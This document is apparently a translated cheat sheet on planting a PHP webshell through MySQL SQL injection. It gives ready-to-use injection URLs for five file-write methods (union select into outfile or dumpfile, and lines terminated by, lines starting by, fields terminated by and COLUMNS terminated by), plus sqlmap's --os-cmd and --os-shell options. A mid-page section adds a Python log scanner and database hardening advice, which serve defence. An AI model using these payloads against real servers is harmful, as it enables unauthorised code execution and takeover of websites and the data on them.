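Several statements for writing a shell through SQL injection
Requires the absolute path and permissions.
Writing after union select
Writing with lines terminated by
Writing with lines starting by
Writing with fields terminated by
Writing with COLUMNS terminated by
Writing after union select
The most common way to write: union select followed by an into outfile statement.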
http://1.1.1.1/x/x.php?id=1 union select 1,2,3,4,'<?php phpinfo() ?>' into outfile 'C:/wamp64/www/work/webshell.php'
http://1.1.1.1/x/x.php?id=1 union select 1,2,3,4,'<?php phpinfo() ?>' into dumpfile 'C:/wamp64/www/work/webshell.php'
PS: On Windows, the separator used in the location is / (forward slash).
Writing with lines terminated by
Injection point statements
http://1.1.1.1/x/x.php?id=1 into outfile 'C:/wamp64/www/work/webshell.php' lines terminated by '<?php phpinfo() ?>';
http://1.1.1.1/x/x.php?id=1 limit 1 into outfile 'C:/wamp64/www/work/webshell.php' lines terminated by '<?php phpinfo() ?>';
Writing with lines starting by
Injection point statements
http://1.1.1.1/x/x.php?id=1 into outfile 'C:/wamp64/www/work/webshell.php' lines starting by '<?php phpinfo() ?>';
http://1.1.1.1/x/x.php?id=1 limit 1 into outfile 'C:/wamp64/www/work/webshell.php' lines starting by '<?php phpinfo() ?>';
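Injection principle
The lines starting by clause is used to splice in the webshell content. lines starting by can be understood as: add xx at the position where each line starts.
Writing with fields terminated by
Injection point statements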
http://1.1.1.1/x/x.php?id=1 into outfile 'C:/wamp64/www/work/webshell.php' fields terminated by '<?php phpinfo() ?>';
http://1.1.1.1/x/x.php?id=1 limit 1 into outfile 'C:/wamp64/www/work/webshell.php' fields terminated by '<?php phpinfo() ?>';
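Injection principle
The fields terminated by clause is used to splice in the webshell content. fields terminated by can be understood as: add xx at the position of each field.
Writing with COLUMNS terminated by
Injection point statements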
http://1.1.1.1/x/x.php?id=1 into outfile 'C:/wamp64/www/work/webshell.php' COLUMNS terminated by '<?php phpinfo() ?>';
http://1.1.1.1/x/x.php?id=1 limit 1 into outfile 'C:/wamp64/www/work/webshell.php' COLUMNS terminated by '<?php phpinfo() ?>';
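Injection principle
COLUMNS terminated by is a synonym of fields terminated by in MySQL, so it splices in the webshell content the same way. It can be understood as: add xx at the position of each field.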
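For the defensive side of the statements listed above, the following added example (not code from the original page) flags request targets in web access logs that carry an into outfile / into dumpfile sink, and reports which of the page's export clauses accompanies it. The function names, the script-extension list and the sample request targets are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# File-write sink: INTO OUTFILE / INTO DUMPFILE followed by a quoted path.
SINK = re.compile(r"\binto\s+(outfile|dumpfile)\s*['\"]([^'\"]*)['\"]", re.I)
# Export clauses listed on this page that place caller-chosen text in the file.
CLAUSE = re.compile(r"\b(lines|fields|columns)\s+(terminated|starting)\s+by\b", re.I)
SCRIPT_EXT = (".php", ".jsp", ".asp", ".aspx")  # assumed list of executable extensions

def normalize(raw):
    """Decode twice (double encoding), drop /* */ comments, fold quotes and spaces."""
    s = unquote_plus(unquote_plus(raw))
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = s.replace("\u2018", "'").replace("\u2019", "'")
    return re.sub(r"\s+", " ", s)

def classify(request_target):
    """Return None if no file-write sink is present, else a finding dict."""
    s = normalize(request_target)
    sink = SINK.search(s)
    if not sink:
        return None
    clause = CLAUSE.search(s, sink.end())
    return {
        "sink": sink.group(1).lower(),
        "clause": " ".join(clause.group(1, 2)).lower() if clause else None,
        "path": sink.group(2),
        "script_target": sink.group(2).lower().endswith(SCRIPT_EXT),
    }

# Constructed request targets (not taken from real logs); 'X' stands in for content.
SAMPLES = [
    "/x/x.php?id=1%20into%20outfile%20%27/var/www/html/a.php%27%20lines%20terminated%20by%20%27X%27",
    "/x/x.php?id=1+UNION+SELECT+1,2,3,4,'X'+INTO/**/DUMPFILE+'/var/www/html/b.php'",
    "/x/x.php?id=1%2520limit%25201%2520into%2520outfile%2520%2527/tmp/o.txt%2527"
    "%2520COLUMNS%2520terminated%2520by%2520%2527X%2527",
    "/search?q=how+to+get+data+into+outfile+formats",
]

def scan(targets):
    """Return (target, finding) pairs for every target that matches."""
    return [(t, f) for t in targets if (f := classify(t)) is not None]

if __name__ == "__main__":
    for target, finding in scan(SAMPLES):
        print(finding, "<-", target[:60])
```

On the database side, all of these statements need the FILE privilege and a secure_file_priv setting that permits the target directory, so revoking FILE from the application account and setting secure_file_priv to NULL or a directory outside the web root blocks the write whichever clause is used.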
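Writing a shell with sqlmap
In all cases the prerequisite is write permission on the target directory.
--os-cmd="net user"
Interactive command execution. Note that when using the interactive mode you need to know the website's absolute path; after successful execution, a file is created under the absolute path to return the result, and it is then deleted automatically.
--os-shell
Writes a webshell. Two files are generated, tmpbshrd.php and tmpucnll.php, which are the command-execution webshell and the file-upload webshell respectively.
Note: the files are deleted when sqlmap is closed.
Reference: https://manning23.github.io/2019/07/23/MYSQL%E5%AD%98%E5%9C%A8%E6%B3%A8%E5%85%A5%E7%82%B9%EF%BC%8C%E5%86%99WebShell%E7%9A%845%E7%A7%8D%E6%96%B9%E5%BC%8F/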